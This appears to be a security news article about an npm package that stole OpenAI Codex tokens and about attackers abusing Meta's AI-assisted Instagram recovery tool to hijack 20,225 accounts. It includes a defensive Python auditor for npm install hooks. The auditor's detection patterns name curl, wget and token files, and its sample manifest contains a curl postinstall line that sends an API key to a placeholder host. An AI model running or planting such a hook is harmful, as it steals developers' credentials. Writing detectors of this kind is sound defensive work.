2026-06-03

Codex UI steals tokens, Meta AI Instagram accounts hijacked

An npm package with 27K weekly downloads exfiltrated OpenAI Codex tokens for a month. Meta's AI-powered Instagram recovery tool was used to hijack 20,225 accounts. Both bugs attacked trust, not cryptography.

Two supply-chain stories landed in the same 48 hours. Aikido Security disclosed that the npm package codexui-android — a remote web UI for OpenAI Codex with roughly 27,000 weekly downloads — had been silently exfiltrating OpenAI refresh tokens to attacker-controlled servers for a month. Then Meta confirmed that a flaw in its AI-assisted Instagram account recovery system ("High Touch Support") let attackers hijack 20,225 Instagram accounts and exfiltrate contact info, dates of birth, and linked social handles.

What You Need to Know: An npm package with 27,000 weekly downloads exfiltrated OpenAI Codex refresh tokens for a month, and a separate bug in Meta's AI support tool let attackers hijack 20,225 Instagram accounts in late May 2026. The AI supply chain and the AI-assisted support chain are both live attack surfaces.

Why It Matters

  • A "legitimate-looking" tool with 27K weekly downloads was a token stealer. codexui-android had a real GitHub repo, active development, and a polished UI. It was also phoning home every Codex auth token it could grab. If your security model is "check the README, see activity, install," it failed here.
  • Meta's AI support tool got hijacked, then used to hijack 20,225 accounts. The High Touch Support (HTS) flaw was discovered on May 31, 2026, and the attackers had already been active. Black-market Telegram groups immediately started advertising "Instagram account takeover" services using it.
  • AI agents are now first-class corporate support tools — and corporate attack surfaces. When Meta put an AI in the account-recovery loop, it trusted the model to verify identity. Attackers bypassed that by impersonating the support tool itself.
  • The CVSS numbers aren't theoretical. LiteLLM was 9.3, Langflow was unauthenticated RCE, and now we have 20K+ real accounts taken over. The defenders lost ground in May.

What Actually Happened

Aikido Security catches codexui-android stealing OpenAI tokens

On May 27, 2026, Aikido Security published a full disclosure of codexui-android, a malicious npm package posing as a remote web UI for OpenAI Codex. The package had a real GitHub repository, frequent commits, and roughly 27,000 weekly downloads at peak — and it was silently exfiltrating OpenAI auth tokens to an external server every time a developer used it.

Aikido's follow-up post on X summarized the threat: "For the past month, codexui-android, an npm package with 27K weekly downloads, has been silently exfiltrating OpenAI Codex auth tokens on install." Hackread's reporting put the impact bluntly: 27,000 weekly downloads means a non-trivial number of OpenAI Codex users had their accounts — and the credentials behind them — exposed.

The package has been removed from npm, but the playbook is now proven. Expect copycats.
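A defender-side check that follows from this, as an added example (not Aikido's code or anything from the package): audit node_modules for install-phase lifecycle scripts, which is how npm runs code "on install" (the mechanism is my assumption; the page does not detail it). The sample manifests are constructed.

```python
"""Flag npm dependencies that run code at install time.

Added example, not Aikido's tooling. The package above exfiltrated tokens
"on install"; on npm that means a preinstall/install/postinstall lifecycle
script (an assumption about the mechanism, which the page does not detail).
"""
import json
import os
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Heuristics only: a hit means "read this script", not proof of malice.
SUSPICIOUS = re.compile(
    r"curl|wget|fetch\(|https?://|\.npmrc|OPENAI|_TOKEN|\.ssh|base64",
    re.IGNORECASE,
)


def audit_package(name: str, pkg: dict) -> list[str]:
    """Return one finding per install-phase hook in a parsed package.json."""
    findings = []
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            level = "HIGH" if SUSPICIOUS.search(cmd) else "INFO"
            findings.append(f"{level} {name}: {hook} -> {cmd}")
    return findings


def audit_tree(node_modules: str) -> list[str]:
    """Audit every package.json below node_modules, nested deps included."""
    findings = []
    for dirpath, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except json.JSONDecodeError:
                continue  # not a parsable manifest; skip it
        findings.extend(audit_package(pkg.get("name", dirpath), pkg))
    return findings


# Constructed samples: a benign native build step, a hostile exfil hook, a clean lib.
SAMPLES = {
    "native-addon": {"scripts": {"install": "node-gyp rebuild"}},
    "evil-ui": {"scripts": {"postinstall": 'curl -s https://example.invalid/c -d "$OPENAI_API_KEY"'}},
    "clean-lib": {"scripts": {"test": "jest"}},
}
```

Run `audit_tree("node_modules")` against a real checkout and treat every HIGH line as a script to read before the next `npm install`; pairing it with `ignore-scripts=true` in `.npmrc` stops the hooks from running at all until reviewed.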

Meta's High Touch Support vulnerability hit 20,225 Instagram accounts

On May 31, 2026, Meta discovered a vulnerability in an AI-assisted account recovery system for Instagram called "High Touch Support" (HTS). BleepingComputer's report confirmed: "Meta has revealed that 20,225 Instagram users had their accounts hijacked in a recent incident where attackers used Meta's AI-powered support" tool to impersonate account owners.

The exposed data per affected user included contact information, date of birth, and linked social media handles. Cybernews called it "Meta bug exposed 20K Instagram accounts", noting the AI-assisted recovery flow was the attack vector. Sid's Blog supplied the criminal-market context: "Multiple black market Telegram groups have sprung up offering 'account takeover' services at steep rates and quick turnaround times" using the same flaw.

The post-mortem from Meta acknowledges the gap. The fix involves gating HTS with stricter identity verification and reducing the AI agent's authority to issue recovery actions.

Why both stories matter together

Both bugs share a single root cause: trusting a software component that looked legitimate. In the npm case, the package had a real repo, real commits, and 27,000 users validating it. In the Meta case, the AI support tool was an internal Meta component trusted by recovery flows. In both, attackers exploited the trust, not a novel cryptographic break.

The pattern is: as soon as an AI component gets production authority, it gets the same threat model as a database admin or a CI pipeline maintainer. That means the same hardening: least-privilege credentials, signed artifacts, behavioral anomaly detection, and human-in-the-loop for high-stakes actions.

The Take

The Codex UI story should be a 2026 wake-up call for the npm-as-infrastructure assumption. "27K weekly downloads" was the camouflage — the attackers knew that download count would make the package look safer. The lesson: download count is a signal attackers can fake, not a trust indicator.

The Meta story is a different kind of brutal. The whole point of putting AI in support is to scale identity verification. When the AI tool itself gets hijacked, you've centralized the attack surface in a way that humans working in shifts never were. Expect every company with an AI-assisted support or recovery flow to revisit their threat model this quarter.

Quick Summary

An npm package with 27K weekly downloads was a token-stealer for a month. Meta's AI-powered Instagram recovery tool was used to hijack 20,225 accounts. Both bugs attacked trust, not cryptography — the same lesson, twice in 48 hours.
